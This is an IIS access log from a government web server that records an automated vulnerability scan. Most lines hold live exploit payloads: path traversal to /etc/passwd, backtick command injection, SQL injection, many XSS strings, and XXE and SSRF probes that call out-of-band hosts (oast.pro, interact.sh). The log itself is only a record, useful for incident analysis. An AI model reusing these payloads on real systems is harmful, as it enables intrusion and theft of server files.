????
Current Path : C:/inetpub/logs/wmsvc/W3SVC1/ |
Current File : C:/inetpub/logs/wmsvc/W3SVC1/ex231231.log |
#Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2023-12-31 00:00:49 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2023-12-31 00:00:49 103.153.214.94 POST /admin/ n=language&c=language_general&a=doExportPack 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2226.0+Safari/537.36 - 404 7 0 10 2023-12-31 00:01:47 103.153.214.94 GET /pages/systemcall.php command=cat%20/etc/passwd 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/70.0.3538.77+Safari/537.36 - 404 7 0 10 2023-12-31 00:03:56 103.153.214.94 GET /admin/ n=language&c=language_general&a=doSearchParameter&editor=cn&word=search&appno=0+union+select+98989*443131,1--+&site=admin 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2309.372+Safari/537.36 - 404 7 0 14 2023-12-31 00:04:04 103.153.214.94 POST /ui/api/v1/ui/auth/login - 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 404 7 0 10 2023-12-31 00:04:33 103.153.214.94 POST /session_login.cgi - 8172 - 203.205.9.60 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 https://bcvt.kontum.gov.vn:8172 404 7 0 11 2023-12-31 00:04:35 103.153.214.94 POST /rpc.cgi - 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2226.0+Safari/537.36 https://bcvt.kontum.gov.vn:8172/sysinfo.cgi?xnavigation=1 404 7 0 5 2023-12-31 00:04:37 103.153.214.94 POST /session_login.cgi - 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2224.3+Safari/537.36 https://bcvt.kontum.gov.vn:8172 404 7 0 6 2023-12-31 00:04:38 103.153.214.94 POST /rpc.cgi - 8172 - 203.205.9.60 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.1+Safari/537.36 https://bcvt.kontum.gov.vn:8172/sysinfo.cgi?xnavigation=1 404 7 0 5 2023-12-31 00:05:05 103.153.214.94 POST /getcfg.php - 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+6.4;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 404 7 0 8 2023-12-31 00:06:21 103.153.214.94 GET /jnoj/web/polygon/problem/viewfile id=1&name=../../../../../../../etc/passwd 8172 - 203.205.9.60 Mozilla/5.0+(X11;+Ubuntu;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/55.0.2919.83+Safari/537.36 - 404 7 0 12 2023-12-31 00:09:57 103.153.214.94 GET /api-third-party/download/extdisks../etc/passwd - 8172 - 203.205.9.60 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/52.0.2762.73+Safari/537.36 - 404 0 0 22 2023-12-31 00:10:28 103.153.214.94 GET /solr/admin/cores wt=json 8172 - 203.205.9.60 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.1+Safari/537.36 - 404 7 0 14 2023-12-31 00:11:10 103.153.214.94 POST /apply_sec.cgi - 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+6.4;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 https://bcvt.kontum.gov.vn:8172 404 7 0 9 2023-12-31 00:11:12 103.153.214.94 POST /apply_sec.cgi - 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 https://bcvt.kontum.gov.vn:8172/login_pic.asp 404 7 0 5 2023-12-31 00:11:14 103.153.214.94 POST /apply_sec.cgi - 8172 - 203.205.9.60 Mozilla/5.0+(X11;+OpenBSD+i386)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.125+Safari/537.36 https://bcvt.kontum.gov.vn:8172/login_pic.asp 404 7 0 5 2023-12-31 00:11:21 103.153.214.94 GET /osm/REGISTER.cmd - 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/40.0.2214.93+Safari/537.36 - 404 7 0 7 2023-12-31 00:11:23 103.153.214.94 GET /osm_tiles/REGISTER.cmd - 8172 - 203.205.9.60 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1847.137+Safari/4E423F - 404 7 0 5 2023-12-31 00:11:42 103.153.214.94 GET /getFavicon host=http://oast.fun/ 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.3319.102+Safari/537.36 - 404 7 0 6 2023-12-31 00:12:56 103.153.214.94 POST /admin/auth/reset-password - 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+6.4;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 404 7 0 10 2023-12-31 00:12:59 103.153.214.94 GET /page/sl_logdl dcfct=DCMlog.download_log&dbkey%3Asyslog.rlog=/etc/passwd 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 404 7 0 6 2023-12-31 00:14:49 103.153.214.94 GET / pum_action=tools_page_tab_system_info 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+6.3;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 404 7 0 7 2023-12-31 00:14:52 103.153.214.94 POST / - 8172 - 203.205.9.60 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.1916.47+Safari/537.36 - 404 7 0 5 2023-12-31 00:16:02 103.153.214.94 GET /MicroStrategyLibrary/auth/ui/loginPage loginMode=alert(document.domain) 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 404 7 0 17 2023-12-31 00:16:32 103.153.214.94 POST /servlet/UploadServlet - 8172 - 203.205.9.60 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1847.137+Safari/4E423F - 404 7 0 8 2023-12-31 00:16:32 103.153.214.94 POST /_syslog.txt - 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 404 7 0 6 2023-12-31 00:16:34 103.153.214.94 GET /test.txt - 8172 - 203.205.9.60 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_4)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/49.0.2656.18+Safari/537.36 - 404 7 0 5 2023-12-31 00:17:52 103.153.214.94 GET /wp-content/plugins/hmapsprem/views/dashboard/index.php p=/wp-content/plugins/hmapsprem/foo%22%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E 8172 - 203.205.9.60 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.1+Safari/537.36 - 404 7 0 11 2023-12-31 00:18:00 103.153.214.94 GET /Login !'><sVg/OnLoAD=alert`1337`// 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+6.4;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 404 7 0 8 2023-12-31 00:18:45 103.153.214.94 GET / - 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+4.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 404 7 0 9 2023-12-31 00:21:30 103.153.214.94 GET /vpns/cfg/smb.conf - 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2226.0+Safari/537.36 - 404 7 0 11 2023-12-31 00:21:38 103.153.214.94 POST /boafrm/formSysCmd - 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2309.372+Safari/537.36 - 404 7 0 6 2023-12-31 00:22:29 103.153.214.94 GET /plus/pass_reset.php L=english&pmc_username=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E%3C 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 404 7 0 10 2023-12-31 00:23:42 103.153.214.94 GET /wp-admin/admin.php page=download_report&report=users&status=all 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+10.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 404 7 0 9 2023-12-31 00:28:50 103.153.214.94 GET / search_term=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&location_search&nearby=off&address_lat&address_lng&distance=10&lcats%5B%5D 8172 - 203.205.9.60 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/54.0.2866.71+Safari/537.36 - 404 7 0 7 2023-12-31 00:31:10 103.153.214.94 POST /dashboard/uploadID.php - 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+6.2;+WOW64)+AppleWebKit/537.36+(KHTML+like+Gecko)+Chrome/44.0.2403.155+Safari/537.36 - 404 7 0 9 2023-12-31 00:32:21 103.153.214.94 GET /xmlpserver/servlet/adfresource format=aaaaaaaaaaaaaaa&documentId=..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5CWindows%5Cwin.ini 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/40.0.2214.93+Safari/537.36 - 404 7 0 15 2023-12-31 00:33:34 103.153.214.94 POST /xmlpserver/ReportTemplateService.xls - 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+6.4;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 404 7 0 12 2023-12-31 00:33:44 103.153.214.94 GET /cs/Satellite pagename=OpenMarket/Xcelerate/Admin/WebReferences 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+6.3;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 404 7 0 15 2023-12-31 00:34:44 103.153.214.94 GET /data/autosuggest-remote.php q="><img%20src=x%20onerror=alert(1)> 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2224.3+Safari/537.36 - 404 7 0 8 2023-12-31 00:34:47 103.153.214.94 GET /admin/data/autosuggest-remote.php q="><img%20src=x%20onerror=alert(1)> 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+4.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 404 7 0 8 2023-12-31 00:35:49 103.153.214.94 GET /xmlpserver/convert xml=<%3fxml+version%3d"1.0"+%3f><!DOCTYPE+r+[<!ELEMENT+r+ANY+><!ENTITY+%25+sp+SYSTEM+"http%3a//cm82ea5htactk4b9pfdg3yzyx95u71gni.oast.pro/xxe.xml">%25sp%3b%25param1%3b]>&_xf=Excel&_xl=123&template=123 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 404 7 0 11 2023-12-31 00:36:09 103.153.214.94 POST /rest/tinymce/1/macro/preview - 8172 - 203.205.9.60 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.1+Safari/537.36 bcvt.kontum.gov.vn:8172 404 7 0 10 2023-12-31 00:36:53 103.153.214.94 POST /pandora_console/index.php login=1 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+4.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 404 7 0 7 2023-12-31 00:36:55 103.153.214.94 POST /pandora_console/index.php sec=netf&sec2=operation/netflow/nf_live_view&pure=0 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+6.4;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 404 7 0 7 2023-12-31 00:38:09 103.153.214.94 GET /cs/Satellite pagename=OpenMarket/Xcelerate/Admin/WebReferences 8172 - 203.205.9.60 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/52.0.2762.73+Safari/537.36 - 404 7 0 9 2023-12-31 00:38:11 103.153.214.94 GET /cs/Satellite pagename=OpenMarket/Xcelerate/Admin/Slots 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 404 7 0 22 2023-12-31 00:39:35 103.153.214.94 GET /secure/ManageFilters.jspa filter=popular&filterView=popular 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+10.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 404 7 0 10 2023-12-31 00:39:47 103.153.214.94 GET /rest/api/2/user/picker query 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2224.3+Safari/537.36 - 404 7 0 7 2023-12-31 00:39:51 103.153.214.94 GET /secure/ConfigurePortalPages!default.jspa view=search&searchOwnerUserName=%3Cscript%3Ealert(1)%3C/script%3E&Search=Search 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.3319.102+Safari/537.36 - 404 7 0 6 2023-12-31 00:40:55 103.153.214.94 GET /test/pathtraversal/master/..%2f..%2f..%2f..%2f../etc/passwd - 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+6.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2228.0+Safari/537.36 - 404 0 0 21 2023-12-31 00:41:50 103.153.214.94 GET /__r2/query-printRows.view schemaName=ListManager&query.queryName=ListManager&query.sort=Nameelk5q%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3Ezp59r&query.containerFilterName=CurrentAndSubfolders&query.selectionKey=%24ListManager%24ListManager%24%24query&query.showRows=ALL 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 404 7 0 9 2023-12-31 00:42:05 103.153.214.94 GET /labkey/__r1/login-login.view returnUrl=http://interact.sh 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2309.372+Safari/537.36 - 404 7 0 14 2023-12-31 00:42:09 103.153.214.94 POST /wls-wsat/CoordinatorPortType - 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+10.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 404 7 0 10 2023-12-31 00:42:11 103.153.214.94 POST /wls-wsat/CoordinatorPortType - 8172 - 203.205.9.60 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/52.0.2762.73+Safari/537.36 - 404 7 0 10 2023-12-31 00:43:33 103.153.214.94 POST /cgi-bin/file_transfer.cgi - 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+6.2;+WOW64)+AppleWebKit/537.36+(KHTML+like+Gecko)+Chrome/44.0.2403.155+Safari/537.36 - 404 7 0 10 2023-12-31 00:44:27 103.153.214.94 GET / - 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/40.0.2214.93+Safari/537.36 - 404 7 0 6 2023-12-31 00:45:32 103.153.214.94 GET /sell-media-search/ keyword=%22%3E%3Cscript%3Ealert%281337%29%3C%2Fscript%3E 8172 - 203.205.9.60 Mozilla/5.0+(X11;+Ubuntu;+Linux+i686+on+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/53.0.2820.59+Safari/537.36 - 404 7 0 8 2023-12-31 00:47:32 103.153.214.94 POST /node/1 _format=hal_json 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+6.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2228.0+Safari/537.36 - 404 7 0 11 2023-12-31 00:49:48 103.153.214.94 POST /wls-wsat/CoordinatorPortType - 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2224.3+Safari/537.36 - 404 7 0 10 2023-12-31 00:49:50 103.153.214.94 POST /_async/AsyncResponseService - 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 404 7 0 12 2023-12-31 00:49:52 103.153.214.94 GET /_async/favicon.ico - 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 404 7 0 6 2023-12-31 00:50:49 103.153.214.94 PUT /wp-content/plugins/w3-total-cache/pub/sns.php - 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 404 7 0 11 2023-12-31 00:51:27 103.153.214.94 POST /adxmlrpc.php - 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+10.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 404 7 0 8 2023-12-31 00:51:29 103.153.214.94 GET /plugins/3rdPartyServers/ox3rdPartyServers/max.class.php 0=id 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 404 7 0 7 2023-12-31 00:54:04 103.153.214.94 GET /webapp/ fccc%27\%22%3E%3Csvg/onload=alert(/xss/)%3E 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/70.0.3538.77+Safari/537.36 - 404 7 0 15 2023-12-31 00:54:36 103.153.214.94 POST /service/extdirect - 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+6.4;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 404 7 0 7 2023-12-31 00:55:51 103.153.214.94 GET /badging/badge_template_v0.php layout=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2226.0+Safari/537.36 - 404 7 0 7 2023-12-31 00:56:03 103.153.214.94 POST /photo/p/api/album.php - 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2224.3+Safari/537.36 - 404 7 0 8 2023-12-31 00:57:58 103.153.214.94 GET /updating.jsp url=https://interact.sh/ 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+6.3;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 404 7 0 29 2023-12-31 00:59:27 103.153.214.94 POST /cgi-bin/supportInstaller - 8172 - 203.205.9.60 MSIE - 404 7 0 8 2023-12-31 01:00:22 103.153.214.94 POST /api/timelion/run - 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+6.4;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 404 7 0 60 2023-12-31 01:02:43 103.153.214.94 GET / c=../../../../../../etc/passwd%00 8172 - 203.205.9.60 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1944.0+Safari/537.36 - 404 7 0 6 2023-12-31 01:02:45 103.153.214.94 GET /badging/badge_print_v0.php tpl=../../../../../etc/passwd 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+4.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 404 7 0 7 2023-12-31 01:03:49 103.153.214.94 POST /rest/issueNav/1/issueTable - 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2117.157+Safari/537.36 - 404 7 0 10 2023-12-31 01:05:31 103.153.214.94 GET /card_scan.php No=30&ReaderNo=%60cat%20/etc/passwd%20%3E%20BwccsoSkgJ.txt%60 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/40.0.2214.93+Safari/537.36 - 404 7 0 8 2023-12-31 01:05:33 103.153.214.94 GET /BwccsoSkgJ.txt - 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 404 7 0 10 2023-12-31 01:05:53 103.153.214.94 GET /rest/api/latest/groupuserpicker query=1&maxResults=50000&showAvatar=true 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2224.3+Safari/537.36 - 404 7 0 10 2023-12-31 01:06:03 103.153.214.94 GET /index.php/login - 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 404 7 0 8 2023-12-31 01:06:11 103.153.214.94 GET /objects/getImage.php base64Url=YGlkID4gbGxqanYudHh0YA===&format=png 8172 - 203.205.9.60 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.1916.47+Safari/537.36 - 404 7 0 5 2023-12-31 01:06:14 103.153.214.94 GET /objects/getImageMP4.php base64Url=YGlkID4gbGxqanYudHh0YA===&format=jpg 8172 - 203.205.9.60 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/54.0.2866.71+Safari/537.36 - 404 7 0 141 2023-12-31 01:06:16 103.153.214.94 GET /objects/getSpiritsFromVideo.php base64Url=YGlkID4gbGxqanYudHh0YA===&format=jpg 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2224.3+Safari/537.36 - 404 7 0 5 2023-12-31 01:06:17 103.153.214.94 GET /objects/lljjv.txt - 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/70.0.3538.77+Safari/537.36 - 404 7 0 4 2023-12-31 01:06:27 103.153.214.94 POST /plugins/servlet/gadgets/makeRequest - 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 404 7 0 12 2023-12-31 01:07:41 103.153.214.94 POST /kindeditor/php/demo.php - 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2117.157+Safari/537.36 - 404 7 0 11 2023-12-31 01:07:43 103.153.214.94 POST /php/demo.php - 8172 - 203.205.9.60 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/52.0.2762.73+Safari/537.36 - 404 7 0 6 2023-12-31 01:09:06 103.153.214.94 GET /hoteldruid/visualizza_tabelle.php anno=2019&id_sessione&tipo_tabella=prenotazioni&subtotale_selezionate=1&num_cambia_pren=1&cerca_id_passati=1&cambia1=3134671%22%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E 8172 - 203.205.9.60 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.1916.47+Safari/537.36 - 404 7 0 10 2023-12-31 01:09:18 103.153.214.94 POST /content/2aGVTKLWxj4jA9xFJrBt78drHx6 - 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+6.2;+WOW64)+AppleWebKit/537.36+(KHTML+like+Gecko)+Chrome/44.0.2403.155+Safari/537.36 https://bcvt.kontum.gov.vn:8172 404 7 0 6 2023-12-31 01:09:20 103.153.214.94 POST /content/2aGVTKLWxj4jA9xFJrBt78drHx6.af.internalsubmit.json - 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2226.0+Safari/537.36 https://bcvt.kontum.gov.vn:8172 404 7 0 18 2023-12-31 01:10:09 103.153.214.94 GET /wavemaker/studioService.download method=getContent&inUrl=file///etc/passwd 8172 - 203.205.9.60 Mozilla/5.0+(X11;+OpenBSD+i386)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.125+Safari/537.36 - 404 7 0 10 2023-12-31 01:11:20 103.153.214.94 GET /s/2aGVTJ29YCh3SPNB0vyIxp800YF/_/WEB-INF/classes/META-INF/maven/com.atlassian.jira/jira-core/pom.xml - 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+6.4;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 404 7 0 12 2023-12-31 01:11:23 103.153.214.94 GET /s/2aGVTJ29YCh3SPNB0vyIxp800YF/_/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.xml - 8172 - 203.205.9.60 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1847.137+Safari/4E423F - 404 7 0 10 2023-12-31 01:12:40 103.153.214.94 GET /wp-content/plugins/gracemedia-media-player/templates/files/ajax_controller.php ajaxAction=getIds&cfg=../../../../../../../../../../etc/passwd 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+6.2;+WOW64)+AppleWebKit/537.36+(KHTML+like+Gecko)+Chrome/44.0.2403.155+Safari/537.36 - 404 7 0 12 2023-12-31 01:13:36 103.153.214.94 POST /Autodiscover/Autodiscover.xml - 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+6.2;+WOW64)+AppleWebKit/537.36+(KHTML+like+Gecko)+Chrome/44.0.2403.155+Safari/537.36 - 404 7 0 11 2023-12-31 01:13:43 103.153.214.94 GET / - 8172 - 162.216.150.122 Expanse,+a+Palo+Alto+Networks+company,+searches+across+the+global+IPv4+space+multiple+times+per+day+to+identify+customers'+presences+on+the+Internet.+If+you+would+like+to+be+excluded+from+our+scans,+please+send+IP+addresses/domains+to:+scaninfo@paloaltonetworks.com - 404 7 0 304 